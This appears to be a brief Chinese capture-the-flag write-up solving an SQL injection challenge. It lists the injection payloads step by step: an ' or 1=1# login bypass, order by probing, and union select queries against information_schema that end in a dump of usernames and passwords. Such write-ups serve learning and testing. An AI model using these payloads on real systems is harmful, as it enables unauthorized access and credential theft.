随便输入
1
1
果然。
1'
1
存在字符注入。
1' or 1=1#
1
实验了下这个用户名和密码,骗人的
这里是一个联合注入:
1' order by 1#
1' order by 2#
1' order by 3#
1' order by 4#
所以有三个字段。
接着查看当前数据库。
1' union select 1,2,database()#
1
当然不止可以获取当前的数据库,还可以获取所有数据库:
1'union select 1,database(),group_concat(schema_name) from information_schema.schemata#
1
看geek中所有的表:
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
1
看字段:
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#
1
查看所有字段的内容:
1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1#
1
最终找到flag